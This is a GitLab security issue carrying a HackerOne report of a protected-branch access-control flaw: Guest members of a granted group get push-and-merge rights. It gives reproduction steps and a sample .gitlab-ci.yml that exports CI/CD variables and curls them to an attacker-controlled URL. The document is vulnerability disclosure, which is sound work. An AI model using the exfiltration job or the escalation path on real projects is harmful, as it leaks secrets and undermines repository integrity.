Skip to content

Unauthorized member can gain `Allowed to push and merge` access and affect integrity of protected branches

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2104540 by theluci on 2023-08-09, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Hello,

I found that when a group is granted Allowed to push and merge access to the protected branch of a project.
It is not checked whether the member gaining Allowed to push and merge access is atleast a Developer in the granted group. But only whether the member has a max role of Developer in the project or not.

Background

Gitlab provides a PREMIUM/ULTIMATE feature to grant specific groups or specific users Allowed to merge and Allowed to push and merge access on protected branches.

2aug-1.png

When a specific user is being granted Allowed to push and merge access.
Only users with atleast Developer role are shown and can be granted the above access.

2aug-2.png

2aug-5.png

Similarly, when a group is granted Allowed to push and merge access to the protected branch of a project.
Only the members of the group with atleast Developer role are granted the above access.

Vulnerability

When a group is granted Allowed to push and merge access to the protected branch of a project.
It is not checked whether the user gaining Allowed to push and merge access is atleast a Developer in the granted group.
It is only checked whether the user,

a) Is a member of the granted group
b) Has a maximum role of Developer in the project

Due to this the following Attack is possible,

  1. victim is the Owner of victim-project.
  2. attacker is a Developer of victim-project.
  3. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds granted-group as Developer.
  4. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, Expand Protected branches and grants Allowed to push and merge access to granted-group.

victim expects that only the members of the granted-group with atleast Developer role are granted the above access.

  1. attacker is successful in joining the granted-group as a Guest.

As attacker and victim are already working on victim-project together, it will be quite easy and most possible for attacker to join granted-group as a Guest.

  1. attacker automatically gains Allowed to push and merge access on the protected branch.

victim has no idea that attacker has gained Allowed to push and merge access on the protected branch.

  1. attacker can use this access to,

    a) Affect the integrity of the protected branch
    b) Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables

Steps to reproduce

  1. victim creates a group victim-group and activates Ultimate trial.

  2. victim creates a project victim-project inside victim-group.

  3. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/project_members and adds attacker as Developer.

  4. victim creates a group granted-group.

  5. victim goes to granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds victim-member as Developer.

  6. victim goes to victim-project membership page https://gitlab.com/<victim-group>/<victim-project>/-/project_members and invites granted-group as Developer.

  7. victim goes to https://gitlab.com/<victim-group>/<victim-project>/-/settings/repository, Expand Protected branches and grants Allowed to push and merge access to granted-group.

victim expects that only the members of the granted-group with atleast Developer role are granted the above access.

  1. victim goes to granted-group membership page https://gitlab.com/groups/<granted-group>/-/group_members and adds attacker as Guest.

As attacker and victim are already working on victim-project together, it will be quite easy and most possible for attacker to join granted-group as a Guest.

  1. attacker automatically gains Allowed to push and merge access on the protected branch.

victim has no idea that attacker has gained Allowed to push and merge access on the protected branch.

  1. attacker can use this access to affect the Integrity of the protected branch,
  • attacker can create a new file using the + symbol.
  • attacker may choose to edit an existing file or delete an existing file.
  1. attacker can also use this access to Upload a malicious .gitlab-ci.yml file with the following content,
job_name:      
 script:      
   - export > test.txt      
   - curl -X POST --data "$(cat test.txt)" attacker-controlled-url

To leak the project and parent group’s CI/CD variables affecting Confidentiality.
(While testing this make sure victim has added some CI/CD variables in victim-project and victim-group)

POC

9aug-2.mp4

Output of checks

This bug happens on GitLab.com (Probably on instance too).

Impact

Unauthorized member can gain Allowed to push and merge access on protected branches and use this access to,

  1. Affect the Integrity of the protected branches.
  2. Upload a malicious .gitlab-ci.yml file to leak the project and parent group’s CI/CD variables affecting Confidentiality.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: